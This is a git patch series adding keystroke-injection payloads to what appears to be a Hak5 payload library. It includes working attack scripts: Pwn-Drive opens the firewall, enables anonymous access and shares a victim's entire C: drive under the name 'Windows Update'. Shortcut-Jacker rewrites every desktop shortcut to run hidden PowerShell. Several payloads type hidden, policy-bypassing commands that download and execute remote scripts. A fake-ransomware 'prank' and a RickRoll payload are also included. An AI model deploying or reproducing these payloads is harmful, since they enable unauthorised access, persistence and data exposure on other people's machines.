From 0e6968eb902b72b0a656c2fa2d16707c36bccd61 Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Mon, 10 Oct 2022 15:00:09 -0400 Subject: [PATCH 1/7] Add files via upload --- RanFunWare/README.md | 108 +++++++++++++++++++++++++++++++++++++++++ RanFunWare/payload.txt | 16 ++++++ RanFunWare/r.ps1 | 70 ++++++++++++++++++++++++++ 3 files changed, 194 insertions(+) create mode 100644 RanFunWare/README.md create mode 100644 RanFunWare/payload.txt create mode 100644 RanFunWare/r.ps1 diff --git a/RanFunWare/README.md b/RanFunWare/README.md new file mode 100644 index 00000000..32c53525 --- /dev/null +++ b/RanFunWare/README.md @@ -0,0 +1,108 @@ + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# RanFunWare + +A payload to prank your friends into thinking their computer got hit with ransomware. + +## Description + +This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable) + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/RanFunWare/payload.txt b/RanFunWare/payload.txt new file mode 100644 index 00000000..87490168 --- /dev/null +++ b/RanFunWare/payload.txt @@ -0,0 +1,16 @@ +REM Title: RanFunWare + +REM Author: atomiczsec + +REM Description: This payload will prank your target into thinking their machine got hit with ransomware. + +REM Target: Windows 10 + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 \ No newline at end of file diff --git a/RanFunWare/r.ps1 b/RanFunWare/r.ps1 new file mode 100644 index 00000000..b5573388 --- /dev/null +++ b/RanFunWare/r.ps1 @@ -0,0 +1,70 @@ +#Hides Desktop Icons +$Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" +Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1 +Get-Process "explorer"| Stop-Process + +#Changes Background +#URL For the Image of your choice (Wanna Cry Ransomware Background) +$url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg" + + +Invoke-WebRequest $url -OutFile C:\temp\test.jpg + + +$setwallpapersrc = @" +using System.Runtime.InteropServices; + +public class Wallpaper +{ + public const int SetDesktopWallpaper = 20; + public const int UpdateIniFile = 0x01; + public const int SendWinIniChange = 0x02; + [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] + private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); + public static void SetWallpaper(string path) + { + SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange); + } +} +"@ +Add-Type -TypeDefinition $setwallpapersrc + +[Wallpaper]::SetWallpaper("C:\temp\test.jpg") + + +#Pop Up Message + +function MsgBox { + +[CmdletBinding()] +param ( +[Parameter (Mandatory = $True)] +[Alias("m")] +[string]$message, + +[Parameter (Mandatory = $False)] +[Alias("t")] +[string]$title, + +[Parameter (Mandatory = $False)] +[Alias("b")] +[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')] +[string]$button, + +[Parameter (Mandatory = $False)] +[Alias("i")] +[ValidateSet('None','Hand','Question','Warning','Asterisk')] +[string]$image +) + +Add-Type -AssemblyName PresentationCore,PresentationFramework + +if (!$title) {$title = " "} +if (!$button) {$button = "OK"} +if (!$image) {$image = "None"} + +[System.Windows.MessageBox]::Show($message,$title,$button,$image) + +} + +MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning From e3b3bf21210e3223a7b147282c1d062e8e8e23d5 Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Mon, 10 Oct 2022 23:05:29 -0400 Subject: [PATCH 2/7] Delete RanFunWare directory --- RanFunWare/README.md | 108 ----------------------------------------- RanFunWare/payload.txt | 16 ------ RanFunWare/r.ps1 | 70 -------------------------- 3 files changed, 194 deletions(-) delete mode 100644 RanFunWare/README.md delete mode 100644 RanFunWare/payload.txt delete mode 100644 RanFunWare/r.ps1 diff --git a/RanFunWare/README.md b/RanFunWare/README.md deleted file mode 100644 index 32c53525..00000000 --- a/RanFunWare/README.md +++ /dev/null @@ -1,108 +0,0 @@ - - -

- - - -

- - -
- Table of Contents -
    -
  1. Description
    2. -
  2. Getting Started
    3. -
  3. Contributing
    4. -
  4. Version History
    5. -
  5. Contact
    6. -
  6. Acknowledgments
    7. -
-
- -# RanFunWare - -A payload to prank your friends into thinking their computer got hit with ransomware. - -## Description - -This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable) - -## Getting Started - -### Dependencies - -* DropBox or other file sharing service - Your Shared link for the intended file -* Windows 10 - -

(back to top)

- -### Executing program - -* Plug in your device -* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory -``` -powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl -``` - -

(back to top)

- -## Contributing - -All contributors names will be listed here - -atomiczsec - -I am Jakoby - -

(back to top)

- -## Version History - -* 0.1 - * Initial Release - -

(back to top)

- - -## Contact - -

πŸ“± My Socials πŸ“±

-
- - - - - - -
- - C# - -
YouTube - 		- - Python - -
Twitter - 		- - Jsonnet - -
I-Am-Jakoby's Discord -
-
- -

(back to top)

- - - - -

(back to top)

- - -## Acknowledgments - -* [Hak5](https://hak5.org/) -* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) - -

(back to top)

diff --git a/RanFunWare/payload.txt b/RanFunWare/payload.txt deleted file mode 100644 index 87490168..00000000 --- a/RanFunWare/payload.txt +++ /dev/null @@ -1,16 +0,0 @@ -REM Title: RanFunWare - -REM Author: atomiczsec - -REM Description: This payload will prank your target into thinking their machine got hit with ransomware. - -REM Target: Windows 10 - -DELAY 2000 -GUI r -DELAY 500 -STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl -ENTER - -REM Remember to replace the link with your DropBox shared link for the intended file to download -REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 \ No newline at end of file diff --git a/RanFunWare/r.ps1 b/RanFunWare/r.ps1 deleted file mode 100644 index b5573388..00000000 --- a/RanFunWare/r.ps1 +++ /dev/null @@ -1,70 +0,0 @@ -#Hides Desktop Icons -$Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1 -Get-Process "explorer"| Stop-Process - -#Changes Background -#URL For the Image of your choice (Wanna Cry Ransomware Background) -$url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg" - - -Invoke-WebRequest $url -OutFile C:\temp\test.jpg - - -$setwallpapersrc = @" -using System.Runtime.InteropServices; - -public class Wallpaper -{ - public const int SetDesktopWallpaper = 20; - public const int UpdateIniFile = 0x01; - public const int SendWinIniChange = 0x02; - [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] - private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); - public static void SetWallpaper(string path) - { - SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange); - } -} -"@ -Add-Type -TypeDefinition $setwallpapersrc - -[Wallpaper]::SetWallpaper("C:\temp\test.jpg") - - -#Pop Up Message - -function MsgBox { - -[CmdletBinding()] -param ( -[Parameter (Mandatory = $True)] -[Alias("m")] -[string]$message, - -[Parameter (Mandatory = $False)] -[Alias("t")] -[string]$title, - -[Parameter (Mandatory = $False)] -[Alias("b")] -[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')] -[string]$button, - -[Parameter (Mandatory = $False)] -[Alias("i")] -[ValidateSet('None','Hand','Question','Warning','Asterisk')] -[string]$image -) - -Add-Type -AssemblyName PresentationCore,PresentationFramework - -if (!$title) {$title = " "} -if (!$button) {$button = "OK"} -if (!$image) {$image = "None"} - -[System.Windows.MessageBox]::Show($message,$title,$button,$image) - -} - -MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning From 1977d49f8ea838a3448c9a0976145f3f32fae0d9 Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Mon, 10 Oct 2022 23:05:56 -0400 Subject: [PATCH 3/7] Add files via upload --- payloads/library/prank/RanFunWare/README.md | 108 ++++++++++++++++++ payloads/library/prank/RanFunWare/payload.txt | 16 +++ payloads/library/prank/RanFunWare/r.ps1 | 70 ++++++++++++ 3 files changed, 194 insertions(+) create mode 100644 payloads/library/prank/RanFunWare/README.md create mode 100644 payloads/library/prank/RanFunWare/payload.txt create mode 100644 payloads/library/prank/RanFunWare/r.ps1 diff --git a/payloads/library/prank/RanFunWare/README.md b/payloads/library/prank/RanFunWare/README.md new file mode 100644 index 00000000..32c53525 --- /dev/null +++ b/payloads/library/prank/RanFunWare/README.md @@ -0,0 +1,108 @@ + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# RanFunWare + +A payload to prank your friends into thinking their computer got hit with ransomware. + +## Description + +This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable) + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/prank/RanFunWare/payload.txt b/payloads/library/prank/RanFunWare/payload.txt new file mode 100644 index 00000000..87490168 --- /dev/null +++ b/payloads/library/prank/RanFunWare/payload.txt @@ -0,0 +1,16 @@ +REM Title: RanFunWare + +REM Author: atomiczsec + +REM Description: This payload will prank your target into thinking their machine got hit with ransomware. + +REM Target: Windows 10 + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 \ No newline at end of file diff --git a/payloads/library/prank/RanFunWare/r.ps1 b/payloads/library/prank/RanFunWare/r.ps1 new file mode 100644 index 00000000..b5573388 --- /dev/null +++ b/payloads/library/prank/RanFunWare/r.ps1 @@ -0,0 +1,70 @@ +#Hides Desktop Icons +$Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" +Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1 +Get-Process "explorer"| Stop-Process + +#Changes Background +#URL For the Image of your choice (Wanna Cry Ransomware Background) +$url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg" + + +Invoke-WebRequest $url -OutFile C:\temp\test.jpg + + +$setwallpapersrc = @" +using System.Runtime.InteropServices; + +public class Wallpaper +{ + public const int SetDesktopWallpaper = 20; + public const int UpdateIniFile = 0x01; + public const int SendWinIniChange = 0x02; + [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] + private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); + public static void SetWallpaper(string path) + { + SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange); + } +} +"@ +Add-Type -TypeDefinition $setwallpapersrc + +[Wallpaper]::SetWallpaper("C:\temp\test.jpg") + + +#Pop Up Message + +function MsgBox { + +[CmdletBinding()] +param ( +[Parameter (Mandatory = $True)] +[Alias("m")] +[string]$message, + +[Parameter (Mandatory = $False)] +[Alias("t")] +[string]$title, + +[Parameter (Mandatory = $False)] +[Alias("b")] +[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')] +[string]$button, + +[Parameter (Mandatory = $False)] +[Alias("i")] +[ValidateSet('None','Hand','Question','Warning','Asterisk')] +[string]$image +) + +Add-Type -AssemblyName PresentationCore,PresentationFramework + +if (!$title) {$title = " "} +if (!$button) {$button = "OK"} +if (!$image) {$image = "None"} + +[System.Windows.MessageBox]::Show($message,$title,$button,$image) + +} + +MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning From 85ecdd5889c21f778002a6de8409c182cf9e53c6 Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Mon, 10 Oct 2022 23:10:33 -0400 Subject: [PATCH 4/7] Add files via upload --- .../library/exfiltration/Pwn-Drive/README.md | 107 ++++++++++++++++++ payloads/library/exfiltration/Pwn-Drive/c.ps1 | 14 +++ .../exfiltration/Pwn-Drive/payload.txt | 16 +++ 3 files changed, 137 insertions(+) create mode 100644 payloads/library/exfiltration/Pwn-Drive/README.md create mode 100644 payloads/library/exfiltration/Pwn-Drive/c.ps1 create mode 100644 payloads/library/exfiltration/Pwn-Drive/payload.txt diff --git a/payloads/library/exfiltration/Pwn-Drive/README.md b/payloads/library/exfiltration/Pwn-Drive/README.md new file mode 100644 index 00000000..c3211bb1 --- /dev/null +++ b/payloads/library/exfiltration/Pwn-Drive/README.md @@ -0,0 +1,107 @@ + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# Pwn-Drive + +A payload to share the victims "C:" drive to the network. + +## Description + +This payload will share the entire victims "C:" drive to the entire network for further exploitation. + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/exfiltration/Pwn-Drive/c.ps1 b/payloads/library/exfiltration/Pwn-Drive/c.ps1 new file mode 100644 index 00000000..798b9eea --- /dev/null +++ b/payloads/library/exfiltration/Pwn-Drive/c.ps1 @@ -0,0 +1,14 @@ +ο»Ώ#Pwn-Drive + +#Enable Network Discovery +netsh advfirewall firewall set rule group=”network discovery” new enable=yes + +#Enable File and Print +netsh firewall set service type=fileandprint mode=enable profile=all + +#Setting Registry Values for allowing access to drive without credentials +Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force +Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force + +#Sharing the Drive +New-SmbShare -Name "Windows Update" -Path "C:\" \ No newline at end of file diff --git a/payloads/library/exfiltration/Pwn-Drive/payload.txt b/payloads/library/exfiltration/Pwn-Drive/payload.txt new file mode 100644 index 00000000..a5dd5245 --- /dev/null +++ b/payloads/library/exfiltration/Pwn-Drive/payload.txt @@ -0,0 +1,16 @@ +REM Title: Pwn-Drive + +REM Author: atomiczsec + +REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation. + +REM Target: Windows 10 + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 From 92e76d35fc66de41a2c3774073ba6e13766ef732 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Mon, 10 Oct 2022 23:37:26 -0500 Subject: [PATCH 5/7] Add files via upload --- .../execution/-BB-ShortcutJacker/README.md | 144 ++++++++++++++++++ .../-BB-ShortcutJacker/Shortcut-Jacker.ps1 | 118 ++++++++++++++ .../execution/-BB-ShortcutJacker/payload.txt | 20 +++ 3 files changed, 282 insertions(+) create mode 100644 payloads/library/execution/-BB-ShortcutJacker/README.md create mode 100644 payloads/library/execution/-BB-ShortcutJacker/Shortcut-Jacker.ps1 create mode 100644 payloads/library/execution/-BB-ShortcutJacker/payload.txt diff --git a/payloads/library/execution/-BB-ShortcutJacker/README.md b/payloads/library/execution/-BB-ShortcutJacker/README.md new file mode 100644 index 00000000..5fab7e17 --- /dev/null +++ b/payloads/library/execution/-BB-ShortcutJacker/README.md @@ -0,0 +1,144 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# Shortcut Jacker + +

+ + Python + +
YouTube Tutorial +

+ +A script used to embed malware in the shortcut on your targets desktop + +## Description + +This payload will run a powershell script in the background of any shortcut used on the targets desktop + +This is done by taking advantage of the ```Target``` field where powershell commands can be stored or run. + +This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the ```$code``` variable and it will still run. + +So if your command exceeds that consider using an IWR function to download and execute a longer script. + +I have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13) + + + +Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the powershell code you want executed is stored. + +--------------------------------------------------------------------------------------------------------------------------------------------------------- + + + +--------------------------------------------------------------------------------------------------------------------------------------------------------- + +Using the ```Get-Shortcut``` function we will get the following information we can then use to maintain the integrity of the appearance of the shortcut after manipulating the ```Target``` field. + + + +## Getting Started + +Once the script is executed all of the shortcuts on your target's desktop will be infected with the powershell code you have stored in the `$code` variable in the .ps1 file + +### Dependencies + +* An internet connection +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload +``` +powershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Golang + +
Instagram + 		+ + Jsonnet + +
Discord +
+
+ +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ +

+ Github Stats +

diff --git a/payloads/library/execution/-BB-ShortcutJacker/Shortcut-Jacker.ps1 b/payloads/library/execution/-BB-ShortcutJacker/Shortcut-Jacker.ps1 new file mode 100644 index 00000000..88de4512 --- /dev/null +++ b/payloads/library/execution/-BB-ShortcutJacker/Shortcut-Jacker.ps1 @@ -0,0 +1,118 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Shortcut-Jacker | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.SYNOPSIS + This is payload used to inject powershell code into shortcuts + +.DESCRIPTION + This payload will gather information on the shortcuts on your targets desktop + That data will then be manipulated to embed a powershell script + This script will be ran in the background when the short cut is + +#> + +############################################################################################################################################################ + +<# +.NOTES + The powershell code stored in this variable is what will run in the background + This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code + variable and it will still run. +#> + +$code = "Add-Type -AssemblyName PresentationCore,PresentationFramework; [System.Windows.MessageBox]::Show('Hacked')" + +############################################################################################################################################################ + +function Get-Shortcut { + param( + $path = $null + ) + + $obj = New-Object -ComObject WScript.Shell + + if ($path -eq $null) { + $pathUser = [System.Environment]::GetFolderPath('StartMenu') + $pathCommon = $obj.SpecialFolders.Item('AllUsersStartMenu') + $path = dir $pathUser, $pathCommon -Filter *.lnk -Recurse + } + if ($path -is [string]) { + $path = dir $path -Filter *.lnk + } + $path | ForEach-Object { + if ($_ -is [string]) { + $_ = dir $_ -Filter *.lnk + } + if ($_) { + $link = $obj.CreateShortcut($_.FullName) + + $info = @{} + $info.Hotkey = $link.Hotkey + $info.TargetPath = $link.TargetPath + $info.LinkPath = $link.FullName + $info.Arguments = $link.Arguments + $info.Target = try {Split-Path $info.TargetPath -Leaf } catch { 'n/a'} + $info.Link = try { Split-Path $info.LinkPath -Leaf } catch { 'n/a'} + $info.WindowStyle = $link.WindowStyle + $info.IconLocation = $link.IconLocation + + return $info + } + } +} + +#----------------------------------------------------------------------------------------------------------- + +function Set-Shortcut { + param( + [Parameter(ValueFromPipelineByPropertyName=$true)] + $LinkPath, + $IconLocation, + $Arguments, + $TargetPath + ) + begin { + $shell = New-Object -ComObject WScript.Shell + } + + process { + $link = $shell.CreateShortcut($LinkPath) + + $PSCmdlet.MyInvocation.BoundParameters.GetEnumerator() | + Where-Object { $_.key -ne 'LinkPath' } | + ForEach-Object { $link.$($_.key) = $_.value } + $link.Save() + } +} + +#----------------------------------------------------------------------------------------------------------- + +function hijack{ +$Link = $i.LinkPath +$Loc = $i.IconLocation +$TargetPath = $i.TargetPath +if($Loc.length -lt 4){$Loc = "$TargetPath$Loc"} +$Target = $i.Target +if(Test-Path -Path "$Link" -PathType Leaf){Set-Shortcut -LinkPath "$Link" -IconLocation "$Loc" -Arguments "-w h -NoP -NonI -Exec Bypass start-process '$TargetPath';$code" -TargetPath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"} +} + +#----------------------------------------------------------------------------------------------------------- + +Get-ChildItem –Path "$Env:USERPROFILE\Desktop" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName} diff --git a/payloads/library/execution/-BB-ShortcutJacker/payload.txt b/payloads/library/execution/-BB-ShortcutJacker/payload.txt new file mode 100644 index 00000000..ffa72dd7 --- /dev/null +++ b/payloads/library/execution/-BB-ShortcutJacker/payload.txt @@ -0,0 +1,20 @@ +REM Title: Shortcut-Jacker + +REM Author: I am Jakoby + +REM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop + +REM Target: Windows 10, 11 + +GET SWITCH_POSITION + +ATTACKMODE HID STORAGE + +LED STAGE1 + +QUACK DELAY 3000 +QUACK GUI r +QUACK DELAY 100 +LED STAGE2 +QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Shortcut-Jacker.ps1')" +QUACK ENTER \ No newline at end of file From 3ee453979dc11f053b68ad70fe1f6a3587188825 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Thu, 13 Oct 2022 01:20:15 -0500 Subject: [PATCH 6/7] Add files via upload --- .../library/prank/-BB-ADV-RickRoll/ReadMe.md | 115 ++++++++++++++++++ .../prank/-BB-ADV-RickRoll/payload.txt | 18 +++ 2 files changed, 133 insertions(+) create mode 100644 payloads/library/prank/-BB-ADV-RickRoll/ReadMe.md create mode 100644 payloads/library/prank/-BB-ADV-RickRoll/payload.txt diff --git a/payloads/library/prank/-BB-ADV-RickRoll/ReadMe.md b/payloads/library/prank/-BB-ADV-RickRoll/ReadMe.md new file mode 100644 index 00000000..76755bb7 --- /dev/null +++ b/payloads/library/prank/-BB-ADV-RickRoll/ReadMe.md @@ -0,0 +1,115 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# ADV-RickRoll + +A script used to do an advanced rick roll on your target + +## Description + +This program rick rolls your target without opening a muted youtube video +A rick roll video is downloaded and played in your powershell console +when a mouse movement is detected + +## Getting Started + +### Dependencies + +* An internet connection +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload +``` +powershell -w h -NoP -NonI -Exec Bypass $U='https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/rr.zip';$Z="$env:TMP"+'\rr.zip';$D="$env:TMP"+'\rr';iwr -Uri $U -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;powershell $D\rr.ps1 +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Golang + +
Instagram + 		+ + Jsonnet + +
Discord +
+
+ +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ +

+ Github Stats +

diff --git a/payloads/library/prank/-BB-ADV-RickRoll/payload.txt b/payloads/library/prank/-BB-ADV-RickRoll/payload.txt new file mode 100644 index 00000000..147d8ad8 --- /dev/null +++ b/payloads/library/prank/-BB-ADV-RickRoll/payload.txt @@ -0,0 +1,18 @@ +* Title: ADV-RickRoll + +* Author: I am Jakoby + +* Description: This is a one liner payload that will Rick Roll your target. Video will be played a full screen and max volume. +* Upon deployment payload will pause until a mouse movement is detected and run once one is. + +* Target: Windows 10, 11 + +* -------------------------------------------------------------------------------------- +* THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. +* -------------------------------------------------------------------------------------- + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass $U='https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/rr.zip';$Z="$env:TMP"+'\rr.zip';$D="$env:TMP"+'\rr';iwr -Uri $U -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;powershell $D\rr.ps1 +ENTER \ No newline at end of file From b110693304ea82eccce85a577c30f36248063007 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Thu, 13 Oct 2022 22:15:32 -0500 Subject: [PATCH 7/7] New Payload - 